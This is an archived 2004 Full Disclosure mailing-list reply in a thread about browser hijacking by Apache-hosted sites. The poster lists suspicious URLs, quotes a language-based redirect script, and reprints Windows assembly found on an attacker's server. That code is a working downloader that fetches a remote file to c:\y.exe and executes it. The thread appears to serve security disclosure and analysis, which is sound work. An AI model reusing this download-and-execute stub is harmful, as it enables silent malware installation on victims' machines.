Full Disclosure mailing list archives

Re: browser hijack by apache sites

From: Matthijs Dalhuijsen <thijs () dalhuijsen com>
Date: Wed, 26 May 2004 04:45:42 +0200


On 24-mei-04, at 14:46, Feher Tamas wrote:

http://www.b00gle.com/fa/?d=get


good thing the internet has a memory :)

http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/%3Fd%3Dget+&hl=enhttp://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/tool.html+&hl=en

http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show thesame files, as if copied in a for loop

i especially liked 2 files in the dir; counter.htm containing theextremely funny

<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>

but then i saw this:http://www.pizdato.biz/acc10/2DimensionOfExploits.asmHehehe, Open Source is getting big!, didnt see no GPL licence so i hopeim not Violating someones copyright by posting this here,....


.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

        szLibrary db "urlmon.dll",0
        szFunction db "URLDownloadToFileA",0

        szFileName db "c:\y.exe", 0

.code
start:

        invoke GetCommandLineA

        add     ax,     0Ah
        lea     ecx,    [eax]
        push    ecx

        invoke LoadLibrary, addr szLibrary
        invoke GetProcAddress, eax, addr szFunction

        pop     ecx
        push    0
        push    0
        lea     ebx,    [szFileName]
        push    ebx
        push    ecx
        push    0
        call    eax

        invoke WinExec, addr szFileName, 1
        invoke ExitProcess, NULL

end start

Yet i do feel a bit suspicious about this set of files;,... bit TOOeducating i think ;)


cheers!

thijs
--

If i had 6 hours to chop down a tree, I'd spend the first foursharpening the axe.

                                       -- Abraham Lincoln

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

browser hijack by apache sites Filbert (May 23)
- <Possible follow-ups>
- Re: browser hijack by apache sites D B (May 23)
- Re:browser hijack by apache sites Ian Latter (May 23)
- browser hijack by apache sites Feher Tamas (May 24)
  - Re: browser hijack by apache sites Filbert (May 24)
  - Re: browser hijack by apache sites Matthijs Dalhuijsen (May 25)